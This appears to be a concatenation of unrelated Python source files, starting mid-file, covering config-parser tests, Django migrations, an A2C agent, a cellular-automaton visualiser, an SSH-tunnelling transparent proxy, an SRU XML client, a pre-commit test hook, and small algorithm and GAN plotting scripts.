with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Config file %s contents not YAML formatted:" % config_file.name in str(e.value)
def test_config_file_only_with_invalid_text_data_unknown_option(config_file):
config_file.write("test: true\n")
config_file.flush()
argv = ['-c', config_file.name]
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Unknown option test in config file %s." % config_file.name == str(e.value)
def test_config_file_only_with_invalid_text_data_unknown_value(config_file):
config_file.write("daemon: unknown\n")
config_file.flush()
argv = ['-c', config_file.name]
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Config file option daemon must be True or False." == str(e.value)
def test_config_file_only_missing_log_value(config_file):
config_file.write("domain: mydomain.com\nuser: thisuser\npasswd: abc\nlog: #True\n")
config_file.flush()
argv = ['-c', config_file.name]
config = libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert None == config['log']
def test_config_file_only_tab_character(config_file):
config_file.write("domain: mydomain.com\nuser:\tthisuser\npasswd: abc")
config_file.flush()
argv = ['-c', config_file.name]
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Tab character found in config file %s. Must use spaces only!" % config_file.name == str(e.value)
def test_config_file_only_with_full_valid_data(config_file):
config_file.write("domain: mydomain.com\nuser: thisuser\npasswd: abc")
config_file.flush()
argv = ['-c', config_file.name]
expected = dict(log=None, daemon=False, verbose=False, interval=60, pid=None, quiet=False, version=False,
registrar='name.com', config=config_file.name, help=False,
user='thisuser', passwd='abc', domain='mydomain.com')
actual = libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert expected == actual
def test_config_file_only_with_full_valid_data_and_comments(config_file):
config_file.write("""
domain: mydomain.com # i am a comment
user: thisuser #comment
#another comment
passwd: abc
""")
config_file.flush()
argv = ['-c', config_file.name]
expected = dict(log=None, daemon=False, verbose=False, interval=60, pid=None, quiet=False, version=False,
registrar='name.com', config=config_file.name, help=False,
user='thisuser', passwd='abc', domain='mydomain.com')
actual = libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert expected == actual
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-29 12:13
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('initiatives', '0021_auto_20191129_1132'),
]
operations = [
migrations.RemoveField(
model_name='initiativeplatformsettings',
name='search_filters',
),
]
|
from django.contrib import admin
from cms.extensions import PageExtensionAdmin
from .models import MetaAttributes
class MetaAttributesAdmin(PageExtensionAdmin):
exclude = ['plugins']
admin.site.register(MetaAttributes, MetaAttributesAdmin)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-06 11:51
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Card',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('word', models.CharField(max_length=60, unique=True)),
('description', models.TextField(blank=True, null=True)),
('difficulty', models.CharField(choices=[('easy', 'Easy'), ('middle', 'Middle'), ('difficult', 'Difficult')], default='difficult', max_length=10)),
('created_date', models.DateTimeField(auto_now_add=True)),
('changed_date', models.DateTimeField(auto_now=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cards', to=settings.AUTH_USER_MODEL)),
],
),
]
|
import numpy as np
import torch
import torch.optim as optim
import torch.nn.functional as F
from agents.common.networks import *
class Agent(object):
"""An implementation of the Advantage Actor-Critic (A2C) agent."""
def __init__(self,
env,
args,
device,
obs_dim,
act_num,
steps=0,
gamma=0.99,
policy_lr=1e-4,
vf_lr=1e-3,
eval_mode=False,
policy_losses=list(),
vf_losses=list(),
logger=dict(),
):
self.env = env
self.args = args
self.device = device
self.obs_dim = obs_dim
self.act_num = act_num
self.steps = steps
self.gamma = gamma
self.policy_lr = policy_lr
self.vf_lr = vf_lr
self.eval_mode = eval_mode
self.policy_losses = policy_losses
self.vf_losses = vf_losses
self.logger = logger
# Policy network
self.policy = CategoricalPolicy(self.obs_dim, self.act_num, activation=torch.tanh).to(self.device)
# Value network
self.vf = MLP(self.obs_dim, 1, activation=torch.tanh).to(self.device)
# Create optimizers
self.policy_optimizer = optim.Adam(self.policy.parameters(), lr=self.policy_lr)
self.vf_optimizer = optim.Adam(self.vf.parameters(), lr=self.vf_lr)
def select_action(self, obs):
"""Select an action from the set of available actions."""
action, _, log_pi = self.policy(obs)
# Prediction V(s)
v = self.vf(obs)
# Add logπ(a|s), V(s) to transition list
self.transition.extend([log_pi, v])
return action.detach().cpu().numpy()
def train_model(self):
log_pi, v, reward, next_obs, done = self.transition
# Prediction V(s')
next_v = self.vf(torch.Tensor(next_obs).to(self.device))
# Target for Q regression
q = reward + self.gamma*(1-done)*next_v
q = q.to(self.device)
# Advantage = Q - V
advant = q - v
if 0: # Check shape of prediction and target
print("q", q.shape)
print("v", v.shape)
print("log_pi", log_pi.shape)
# A2C losses
policy_loss = -log_pi*advant.detach()
vf_loss = F.mse_loss(v, q.detach())
# Update value network parameter
self.vf_optimizer.zero_grad()
vf_loss.backward()
self.vf_optimizer.step()
# Update policy network parameter
self.policy_optimizer.zero_grad()
policy_loss.backward()
self.policy_optimizer.step()
# Save losses
self.policy_losses.append(policy_loss.item())
self.vf_losses.append(vf_loss.item())
def run(self, max_step):
step_number = 0
total_reward = 0.
images = []
obs = self.env.reset()
done = False
# Keep interacting until agent reaches a terminal state.
while not (done or step_number == max_step):
if self.args.render:
images.append(self.env.render('rgb_array'))
if self.eval_mode:
_, pi, _ = self.policy(torch.Tensor(obs).to(self.device))
action = pi.argmax().detach().cpu().numpy()
next_obs, reward, done, _ = self.env.step(action)
else:
self.steps += 1
# Create a transition list
self.transition = []
# Collect experience (s, a, r, s') using some policy
action = self.select_action(torch.Tensor(obs).to(self.device))
next_obs, reward, done, _ = self.env.step(action)
# Add (r, s') to transition list
self.transition.extend([reward, next_obs, done])
self.train_model()
total_reward += reward
step_number += 1
obs = next_obs
# Save total average losses
self.logger['LossPi'] = round(np.mean(self.policy_losses), 5)
self.logger['LossV'] = round(np.mean(self.vf_losses), 5)
return step_number, total_reward, images
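# A minimal standalone sketch (dummy tensors, detached from the Agent class and
# the environment) of the A2C targets and losses computed in train_model above.
if __name__ == '__main__':
    gamma = 0.99
    v = torch.tensor([0.5])                    # V(s)
    next_v = torch.tensor([0.7])               # V(s')
    log_pi = torch.tensor([-0.3])              # log pi(a|s)
    reward, done = 1.0, 0.0
    q = reward + gamma * (1 - done) * next_v   # bootstrapped target
    advant = q - v                             # advantage estimate
    policy_loss = -log_pi * advant.detach()    # actor loss
    vf_loss = F.mse_loss(v, q.detach())        # critic loss
    print(policy_loss.item(), vf_loss.item())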
|
#version 1
#
#
#Setup data structure
#Made timer that includes fps
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph.opengl as gl
import pyqtgraph as pg
import numpy as np
import random
#import time
from pyqtgraph.ptime import time
import functools
app = QtGui.QApplication([])
w = gl.GLViewWidget()
w.show()
g = gl.GLGridItem()
w.addItem(g)
def nearFunction(mat,i,j,k):
return mat[i+1,j,k-1] or mat[i,j+1,k-1] or mat[i,j,k-1] or \
mat[i-1,j,k] or mat[i,j-1,k] or mat[i,j,k-1] or \
mat[i+2,j,k] or mat[i,j+2,k] or \
mat[i-2,j,k] or mat[i,j-2,k] or mat[i,j,k-2]
def makeSeedRand(mat):
row, col, layer = mat.shape
for i in range(2, row-2):
for j in range(2, col-2):
for k in range(2, layer-2):
#p = 0.311
p = 0.211
randNum = random.uniform(0, 1)
if(randNum <= p):
mat[i,j,k] = 1
#matB[i,j,k] = 1
# if(1*(row/3) < i and i < 2*(row/3)): #middle third
# if(1*(col/3) < j and j < 2*(col/3)): #middle third
# if(k < 1*(layer/3)):
# #if(1*(layer/3) < k and k < 2*(layer/3)): #middle third
# randNum = random.randint(0,25)
# if(randNum <= 1):
# mat[i,j,k] = 1
# #matB[i,j,k] = 1
# else:
# randNum = random.randint(0,250)
# if(randNum <= 1):
# mat[i,j,k] = 1
def plantSeed(mat, numSeeds):
#plant numSeeds active cells at random positions in the box (borders excluded)
row, col, layer = mat.shape
for i in range(numSeeds):
rowRand = random.randint(2,row-2);
colRand = random.randint(2,col-2);
layerRand = random.randint(2,layer-2);
mat[rowRand,colRand,layerRand] = 1
def iterateForwardVector():
humCopy = hum.copy()
actCopy = act.copy()
cldCopy = cld.copy()
row, col, lay = hum.shape
hum[2:row-2, 2:col-2, 2:lay-2] = humCopy[2:row-2, 2:col-2, 2:lay-2] & (~ actCopy[2:row-2, 2:col-2, 2:lay-2])
cld[2:row-2, 2:col-2, 2:lay-2] = np.logical_or(cldCopy[2:row-2, 2:col-2, 2:lay-2] , actCopy[2:row-2, 2:col-2, 2:lay-2])
matR1 = np.roll(np.roll(act,-1,axis=0),1,axis=2) # mat[i+1,j,k-1]
matR2 = np.roll(np.roll(act,-1,axis=1),1,axis=2) # mat[i,j+1,k-1]
matR3 = np.roll(act,1,axis=2) # mat[i,j,k-1]
matR4 = np.roll(act,1,axis=0) # mat[i-1,j,k]
matR5 = np.roll(act,1,axis=1) # mat[i,j-1,k]
matR6 = np.roll(act,1,axis=2) # mat[i,j,k-1]
matR7 = np.roll(act,-2,axis=0) # mat[i+2,j,k]
matR8 = np.roll(act,-2,axis=1) # mat[i,j+2,k]
matR9 = np.roll(act,2,axis=0) # mat[i-2,j,k]
matR10 = np.roll(act,2,axis=1) # mat[i,j-2,k]
matR11 = np.roll(act,2,axis=2) # mat[i,j,k-2]
act[2:row-2, 2:col-2, 2:lay-2] = (~ actCopy[2:row-2, 2:col-2, 2:lay-2]) & humCopy[2:row-2, 2:col-2, 2:lay-2] & \
np.logical_or(matR1[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR2[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR3[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR4[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR5[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR6[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR7[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR8[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR9[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR10[2:row-2, 2:col-2, 2:lay-2],matR11[2:row-2, 2:col-2, 2:lay-2]))))))))))
lenI = 60
lenJ = 60
lenK = 60
hum = np.zeros((lenI, lenJ, lenK))
act = np.zeros((lenI, lenJ, lenK))
cld = np.zeros((lenI, lenJ, lenK))
hum = hum.astype(int)
act = act.astype(int)
cld = cld.astype(int)
makeSeedRand(hum)
plantSeed(act,2)
indexesFinal = np.array([[1,2,3]])
sp2 = gl.GLScatterPlotItem(pos=indexesFinal,size=1.5,pxMode=False)
w.addItem(sp2)
def resetVars():
global hum, act, cld, indexesFinal
hum = np.zeros((lenI, lenJ, lenK))
act = np.zeros((lenI, lenJ, lenK))
cld = np.zeros((lenI, lenJ, lenK))
hum = hum.astype(int)
act = act.astype(int)
cld = cld.astype(int)
makeSeedRand(hum)
plantSeed(act,2)
indexesFinal = np.array([[1,2,3]])
totalIterations = 80
numIteration = 0
lastTime = time()
fps = None
def update():
global numIteration, indexesFinal, lastTime, fps
if(numIteration < totalIterations) :
sp2.setData(pos=indexesFinal)
indexes = np.where(cld==1)
indexesFinal = np.array([[indexes[0][i],indexes[1][i],indexes[2][i]] for i in range(len(indexes[0]))])
iterateForwardVector()
numIteration+=1
else:
resetVars()
numIteration = 0
now = time()
dt = now - lastTime
lastTime = now
if fps is None:
fps = 1.0/dt
else:
s = np.clip(dt*3., 0, 1)
fps = fps * (1-s) + (1.0/dt) * s
print('%0.2f fps' % fps)
t = QtCore.QTimer()
t.timeout.connect(update)
t.start(5)
## Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
|
import numpy as np
# different operations of the numpy library
# ndim is an attribute that gives the number of dimensions of the array
# 1-dimensional array
a= np.array([1,2,3,4,5])
print(a.ndim)
# 2-dimensional array
a=np.array([(1,2,3),(1,6,5)])
print(a.ndim)
# printing the datatype and number of elements of an array
a=np.array([("sandip","aditi"),("rakesh","cp")])
print(a.dtype)
print(a.size)
a=np.array([(1,23,44,5,6),(12,11,12,5,6)])
print(a.shape)
print(a.min())
print(a.sum())
a=np.linspace(1,3,5)
print(a)
a= np.linspace(1,3,10)
print(a)
a= np.array([(1,2,3,4,5),(2,4,5,6,7)])
print(a.shape)
print(a.sum(axis=0))
print(a.sum(axis=1))
|
import asyncio
import logging
import collections
import socket
import ctypes
from functools import partial
from . import constants
from .utils import detect_af
from .baselistener import BaseListener
BUFSIZE = constants.BUFSIZE
def detect_af(addr):
return socket.getaddrinfo(addr,
None,
socket.AF_UNSPEC,
0,
0,
socket.AI_NUMERICHOST)[0][0]
class sockaddr(ctypes.Structure):
_fields_ = [('sa_family', ctypes.c_uint16),
('sa_data', ctypes.c_char * 14),
]
class sockaddr_in(ctypes.Structure):
_fields_ = [('sin_family', ctypes.c_uint16),
('sin_port', ctypes.c_uint16),
('sin_addr', ctypes.c_uint32),
]
sockaddr_size = max(ctypes.sizeof(sockaddr_in), ctypes.sizeof(sockaddr))
class sockaddr_in6(ctypes.Structure):
_fields_ = [('sin6_family', ctypes.c_uint16),
('sin6_port', ctypes.c_uint16),
('sin6_flowinfo', ctypes.c_uint32),
('sin6_addr', ctypes.c_char * 16),
('sin6_scope_id', ctypes.c_uint32),
]
sockaddr6_size = ctypes.sizeof(sockaddr_in6)
def get_orig_dst(sock):
own_addr = sock.getsockname()[0]
own_af = detect_af(own_addr)
if own_af == socket.AF_INET:
buf = sock.getsockopt(socket.SOL_IP, constants.SO_ORIGINAL_DST, sockaddr_size)
sa = sockaddr_in.from_buffer_copy(buf)
addr = socket.ntohl(sa.sin_addr)
addr = str(addr >> 24) + '.' + str((addr >> 16) & 0xFF) + '.' + str((addr >> 8) & 0xFF) + '.' + str(addr & 0xFF)
port = socket.ntohs(sa.sin_port)
return addr, port
elif own_af == socket.AF_INET6:
buf = sock.getsockopt(constants.SOL_IPV6, constants.SO_ORIGINAL_DST, sockaddr6_size)
sa = sockaddr_in6.from_buffer_copy(buf)
addr = socket.inet_ntop(socket.AF_INET6, sa.sin6_addr)
port = socket.ntohs(sa.sin_port)
return addr, port
else:
raise RuntimeError("Unknown address family!")
class TransparentListener(BaseListener): # pylint: disable=too-many-instance-attributes
def __init__(self, *,
listen_address,
listen_port,
pool,
timeout=4,
loop=None):
self._loop = loop if loop is not None else asyncio.get_event_loop()
self._logger = logging.getLogger(self.__class__.__name__)
self._listen_address = listen_address
self._listen_port = listen_port
self._children = set()
self._server = None
self._pool = pool
self._timeout = timeout
async def stop(self):
self._server.close()
await self._server.wait_closed()
while self._children:
children = list(self._children)
self._children.clear()
self._logger.debug("Cancelling %d client handlers...",
len(children))
for task in children:
task.cancel()
await asyncio.wait(children)
# workaround for TCP server keeps spawning handlers for a while
# after wait_closed() completed
await asyncio.sleep(.5)
async def _pump(self, writer, reader):
while True:
data = await reader.read(BUFSIZE)
if not data:
break
writer.write(data)
await writer.drain()
async def handler(self, reader, writer):
peer_addr = writer.transport.get_extra_info('peername')
self._logger.info("Client %s connected", str(peer_addr))
dst_writer = None
try:
# Instead get dst addr from socket options
sock = writer.transport.get_extra_info('socket')
dst_addr, dst_port = get_orig_dst(sock)
self._logger.info("Client %s requested connection to %s:%s",
peer_addr, dst_addr, dst_port)
async with self._pool.borrow() as ssh_conn:
dst_reader, dst_writer = await asyncio.wait_for(
ssh_conn.open_connection(dst_addr, dst_port),
self._timeout)
t1 = asyncio.ensure_future(self._pump(writer, dst_reader))
t2 = asyncio.ensure_future(self._pump(dst_writer, reader))
try:
await asyncio.gather(t1, t2)
finally:
for t in (t1, t2):
if not t.done():
t.cancel()
while not t.done():
try:
await t
except asyncio.CancelledError:
pass
except asyncio.CancelledError: # pylint: disable=try-except-raise
raise
except Exception as exc: # pragma: no cover
self._logger.exception("Connection handler stopped with exception:"
" %s", str(exc))
finally:
self._logger.info("Client %s disconnected", str(peer_addr))
if dst_writer is not None:
dst_writer.close()
writer.close()
async def start(self):
def _spawn(reader, writer):
def task_cb(task, fut):
self._children.discard(task)
task = self._loop.create_task(self.handler(reader, writer))
self._children.add(task)
task.add_done_callback(partial(task_cb, task))
self._server = await asyncio.start_server(_spawn,
self._listen_address,
self._listen_port)
self._logger.info("Transparent Proxy server listening on %s:%d",
self._listen_address, self._listen_port)
async def __aenter__(self):
await self.start()
return self
async def __aexit__(self, exc_type, exc, tb):
await self.stop()
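# A hypothetical usage sketch (the SSH connection pool is constructed elsewhere
# in this package; the name `pool` below is an assumption, not part of this
# module):
# async def serve(pool):
#     async with TransparentListener(listen_address='127.0.0.1',
#                                    listen_port=1234, pool=pool) as listener:
#         await asyncio.sleep(3600)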
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-05-24 03:41
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('frbb', '0007_userprofile_withdrawn'),
]
operations = [
migrations.AddField(
model_name='poem',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 5, 24, 3, 41, 34, 773855, tzinfo=utc)),
preserve_default=False,
),
migrations.AddField(
model_name='userprofile',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 5, 24, 3, 41, 41, 245833, tzinfo=utc)),
preserve_default=False,
),
migrations.AlterField(
model_name='userprofile',
name='balance',
field=models.IntegerField(default=5),
),
]
|
"""Test data_utils
"""
import pytest
from pytest import fixture
from kipoi.data import PreloadedDataset
import numpy as np
@fixture
def data():
return {"a": [np.arange(3)],
"b": {"d": np.arange(3)},
"c": np.arange(3).reshape((-1, 1))
}
@fixture
def bad_data():
return {"a": [np.arange(3)],
"b": {"d": np.arange(4)},
"c": np.arange(3).reshape((-1, 1)),
"e": 1
}
def test_preloaded_dataset(data):
def data_fn():
return data
d = PreloadedDataset.from_fn(data_fn)()
assert d.load_all() == data
assert len(d) == 3
assert d[1] == {"a": [1], "b": {"d": 1}, "c": np.array([1])}
assert list(d.batch_iter(2))[1] == {'a': [np.array([2])], 'b': {'d': np.array([2])}, 'c': np.array([[2]])}
|
import time, httplib, urllib2, socket
from lxml import etree
from lxml import objectify
class SruObject:
""" Abstract class for objectifying SRU XML
ZSI attrs: name, typecode
"""
tree = None
def __dir__(self):
attrlist = dir(self)
attrlist.extend(['name', 'typecode'])
attrlist.sort()
return attrlist
def __init__(self, node):
self.tree = node
def __getattr__(self, name):
# avoid command line repr weirdness
if name == '__repr__':
raise AttributeError
elif name == 'name':
return self.tag[self.tag.find('}')+1:]
elif name =='typecode':
return
return getattr(self.tree, name)
def __str__(self):
# return objectify.dump(self.tree)
return etree.tostring(self.tree)
#- end SruObject ----------------------------------------------------------
class SruRecord(SruObject):
""" Thin wrapper for records returned in SRU responses.
Note: Not the same as a Cheshire3 Record - although the recordData could be used to construct one...
ZSI attrs (additional): inline, recordData, recordPacking, recordPosition, recordSchema
"""
def __dir__(self):
attrlist = SruObject.__dir__(self)
attrlist.extend(['inline', 'recordData', 'recordPacking', 'recordPosition', 'recordSchema'])
attrlist.sort()
return attrlist
def __getattr__(self, name):
if name == 'recordData':
if self.recordPacking == 'string':
return SruRecordData(objectify.fromstring(str(self.tree.recordData)))
else:
# default: recordPacking == 'xml'
return SruRecordData(self.tree.recordData.getchildren()[0])
return SruObject.__getattr__(self, name)
#- end SruRecord ----------------------------------------------------------
class SruRecordData(SruObject):
def __dir__(self):
attrlist = SruObject.__dir__(self)
attrlist.extend(['toxml'])
attrlist.sort()
return attrlist
def __getattr__(self, name):
if name == 'id':
try:
return self.tree.attrib['id']
except KeyError:
pass
return SruObject.__getattr__(self, name)
def toxml(self):
return etree.tostring(self.tree)
#- end SruRecordData ------------------------------------------------------
class SruResponse(SruObject):
""" Abstract class for SRU responses
ZSI attrs (additional): diagnostics, extraResponseData, version
"""
def __dir__(self):
attrlist = SruObject.__dir__(self)
attrlist.extend(['diagnostics', 'extraResponseData', 'version'])
attrlist.sort()
return attrlist
def __getattr__(self, name):
if name == 'diagnostics':
try:
diags = SruObject.__getattr__(self, name)
return [ el for el in diags.iterchildren(tag='{http://www.loc.gov/zing/srw/diagnostic/}diagnostic') ]
except AttributeError:
return []
return SruObject.__getattr__(self, name)
#- end SruResponse --------------------------------------------------------
class ExplainResponse(SruResponse):
""" Thin wrapper for SRU Explain Response
ZSI attrs (additional): echoedExplainRequest, record
"""
def __dir__(self):
attrlist = SruResponse.__dir__(self)
attrlist.extend(['echoedExplainRequest', 'record'])
attrlist.sort()
return attrlist
def __getattr__(self, name):
if name == 'record':
return SruRecord(self.tree.record)
return SruResponse.__getattr__(self, name)
def __str__(self):
return objectify.dump(self.tree)
#return "%s:\n Version: %s\n Record (presence of): %i\n Diagnostics: %s\n ExtraResponseData: %s" % (self.__class__.__name__, self.version, self.record <> None, repr(self.diagnostics), repr(self.extraResponseData))
#- end ExplainResponse ----------------------------------------------------
class SearchRetrieveResponse(SruResponse):
""" Thin wrapper for SRU SearchRetrieve Response
ZSI attrs (additional): echoedSearchRetrieveRequest, numberOfRecords, records, nextRecordPosition, resultSetId, resultSetIdleTime
"""
def __dir__(self):
attrlist = SruResponse.__dir__(self)
attrlist.extend(['echoedSearchRetrieveRequest', 'nextRecordPosition', 'numberOfRecords', 'records', 'resultSetId', 'resultSetIdleTime'])
attrlist.sort()
return attrlist
def __getattr__(self, name):
if name == 'records':
try:
return [SruRecord(el) for el in self.tree.records.record]
except AttributeError:
return []
return SruResponse.__getattr__(self, name)
#- end SearchRetrieveResponse ---------------------------------------------
class ScanResponse(SruResponse):
""" Thin wrapper for SRU Scan Response
ZSI attrs (additional): echoedScanRequest, terms
"""
def __dir__(self):
attrlist = SruResponse.__dir__(self)
        attrlist.extend(['echoedScanRequest', 'terms'])
attrlist.sort()
return attrlist
def __getattr__(self, name):
if name == 'terms':
try:
return [el for el in self.tree.terms.term]
except AttributeError:
return []
return SruResponse.__getattr__(self, name)
#- end ScanResponse -------------------------------------------------------
def fetch_data(myUrl, tries=1, timeout=20):
oldtimeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
req = urllib2.Request(url=myUrl)
data = None
for x in range(tries):
try:
f = urllib2.urlopen(req)
except (urllib2.URLError):
# problem accessing remote service
continue
except httplib.BadStatusLine:
# response broken
time.sleep(0.5)
continue
else:
data = f.read()
f.close()
break
socket.setdefaulttimeout(oldtimeout)
return data
objectifier = objectify.makeparser(remove_blank_text=False)
# functions to fetch and return a parsed response object when given a URL
def get_explainResponse(url, tries=1, timeout=20):
data = fetch_data(url, tries=tries, timeout=timeout)
if data:
tree = objectify.fromstring(data, objectifier)
return ExplainResponse(tree)
def get_searchRetrieveResponse(url, tries=1, timeout=20):
data = fetch_data(url, tries=tries, timeout=timeout)
if data:
tree = objectify.fromstring(data, objectifier)
return SearchRetrieveResponse(tree)
def get_scanResponse(url, tries=1, timeout=20):
data = fetch_data(url, tries=tries, timeout=timeout)
if data:
tree = objectify.fromstring(data, objectifier)
return ScanResponse(tree)
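# A minimal usage sketch (not part of the original module): fetch and inspect a
# searchRetrieve response. The base URL and query below are hypothetical
# placeholders; point them at a real SRU endpoint before running.
if __name__ == '__main__':
    example_url = ('http://sru.example.org/db?version=1.1'
                   '&operation=searchRetrieve&query=dog&maximumRecords=3')
    sr_response = get_searchRetrieveResponse(example_url, tries=2, timeout=10)
    if sr_response is not None:
        print('numberOfRecords: %s' % sr_response.numberOfRecords)
        for rec in sr_response.records:
            print('schema %s, position %s' % (rec.recordSchema, rec.recordPosition))
    else:
        print('no data returned from %s' % example_url)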
|
# -*- coding: utf-8 -*-
from django.contrib import admin
from mptt.admin import MPTTModelAdmin
from mptt_graph.models import GraphModel, TreeNode
@admin.register(GraphModel)
class UrlTreeAdmin(admin.ModelAdmin):
list_display = ["title", "model_path", "model_pk"]
@admin.register(TreeNode)
class TreeNodeAdmin(MPTTModelAdmin):
mptt_level_indent = 30
|
class Grating:
    """A class that describes gratings. The grating spacing should be given in
    lines/mm and the units of the dimensions should be mm.
    """
def __init__(self, name='', spacing=600, order=1, height=100, width=100,
thickness=100, blaze=0, type='transmission'):
# define the variables that describe the grating
self.order = order
self.height = height
self.width = width
self.thickness = thickness
self.sigma = 1.0 / spacing
self.blaze = blaze
self.name = name
self.type = type
# set the sign for the grating equation
self.sign = 1
if self.type == 'transmission':
self.sign = -1
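# A minimal usage sketch (not part of the original class): instantiate a
# transmission grating and evaluate a grating equation of the form
#     sin(theta_out) = sign * sin(theta_in) + order * wavelength / sigma,
# using the sign convention set above. The helper code and the 500 nm
# wavelength are illustrative assumptions, not part of the class API.
if __name__ == '__main__':
    import math
    g = Grating(name='demo', spacing=600, order=1, type='transmission')
    wavelength = 500e-6  # 500 nm expressed in mm, consistent with sigma (mm per line)
    theta_in = math.radians(10.0)
    sin_out = g.sign * math.sin(theta_in) + g.order * wavelength / g.sigma
    print('diffraction angle: %.2f degrees' % math.degrees(math.asin(sin_out)))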
|
import argparse
import os
import subprocess
VENV_DIR = 'PRE_COMMIT_VENV'
def create_venv_dir():
"""
Create virtualenv for running unit tests
"""
SHELL_EXEC = []
SHELL_EXEC.append(F'set -e')
SHELL_EXEC.append(F'virtualenv {VENV_DIR}')
return_code = os.system(';'.join(SHELL_EXEC))
return return_code
def main(argv=None):
try:
        # Create parser for arguments
parser = argparse.ArgumentParser()
parser.add_argument('filenames', nargs='*')
parser.add_argument('--testdir', type=str)
parser.add_argument('--managedir', type=str)
parser.add_argument('--requirements', type=str)
args = parser.parse_args(argv)
del args.filenames
# Ensure parameter files and directories exist
if not os.path.exists(args.testdir):
return F'Test directory path does not exist. Given directory: {args.testdir}'
if not os.path.exists(args.managedir):
return F'manage.py directory path does not exist. Given directory: ' + \
args.managedir
if not os.path.exists(args.requirements):
return F'Requirements directory path does not exist. Given directory: ' + \
args.requirements
# Check that virtualenv dir exists
if not os.path.exists(VENV_DIR):
return_code = create_venv_dir()
if return_code != 0:
return 'Could not create pre-commit virtual environment. ' + \
'Please ensure you have virtualenv installed and available. ' + \
'Install with: "pip install virtualenv"'
# Parse Directories from args
test_directory = args.testdir
manage_directory = args.managedir
manage_py_path = os.path.join(manage_directory, 'manage.py')
# Build shell command
SHELL_EXEC = []
v_env_activate = os.path.join(VENV_DIR, 'bin', 'activate')
SHELL_EXEC.append(F'set -e')
SHELL_EXEC.append(F'source {v_env_activate}')
SHELL_EXEC.append(F'pip install -r {args.requirements} --no-warn-conflicts')
SHELL_EXEC.append(F'python {manage_py_path} test {test_directory} --noinput')
return_code = os.system(';'.join(SHELL_EXEC))
if return_code != 0:
return 1
# Success
return 0
except Exception as e:
print(e.args[0])
return 1
if __name__ == '__main__':
main()
|
# _*_ coding: utf-8 _*_
"""
@Date: 2021/5/2 4:08 PM
@Author: wz
@File: AssignCookies.py
@Desc:
"""
'''
question:
    There is a group of children and a pile of cookies. Each child has a hunger level,
    and each cookie has a size. Each child can eat at most one cookie, and a child is
    satisfied only if the cookie's size is not smaller than the child's hunger level.
    Find the maximum number of children that can be satisfied.
example:
    Input: two arrays, the children's hunger levels and the cookie sizes.
    Output: the maximum number of children that can be satisfied.
    Input: [1,2], [1,2,3]
    Output: 2
'''
class Solution():
def __init__(self, children, cookies):
self.children, self.cookies = children, cookies
def find_content_children(self):
children = sorted(self.children)
cookies = sorted(self.cookies)
print("children:", children)
print("cookies: ", cookies)
        # Greedy choice: give each child the smallest cookie that satisfies their
        # hunger level, until either the cookies or the children list is exhausted
child, cookie = 0, 0
while (child<len(children) and cookie<len(cookies)) :
if cookies[cookie]>=children[child]:
child += 1
cookie += 1
return child
if __name__ == "__main__":
children = [1,4,6,7,2,4,6,7,9,100]
cookies = [1,3,2,5,6,4,10]
solution = Solution(children, cookies)
print(solution.find_content_children())
|
from pdb import set_trace as T
import numpy as np
from matplotlib import pyplot as plt
import torch
from visualize import visualize, visGANGAN
from gan import SimpleGAN
gandir = 'data/gan/0/'
gangandir = 'data/gangan/'
fig = plt.figure(frameon=False)
#fig.set_size_inches(16, 4)
ax = plt.Axes(fig, [0., 0., 1., 1.])
ax.set_axis_off()
fig.add_axes(ax)
#GAN Figure
img = []
buf = 1+np.zeros((28*8, 2))
noise = torch.randn(64, 64).cuda()
for i in (0, 1, 10, 25, 27, 30, 32, 35, 40, 49):
params = torch.load(gandir+'model_'+str(i)+'.pt')
gan = SimpleGAN(28*28, zdim=64, hd=64, hg=64, lr=2e-4)
gan.load_state_dict(params)
gan = gan.cuda()
ary = visualize(gan, noise, show=False)
img.append(ary)
img1 = [img[0], buf, img[1], buf, img[2], buf, img[3], buf, img[4]]
hbuf = 1+np.zeros((2, 28*8*5+8))
img2 = [img[5], buf, img[6], buf, img[7], buf, img[8], buf, img[9]]
img = np.vstack([np.hstack(img1), hbuf, np.hstack(img2)])
ax.imshow(img)
#plt.show()
fig.savefig('gan_training.png', dpi=200, bbox_inches='tight')
#GAN-GAN Figure
gannoise = torch.randn(40, 64).cuda()
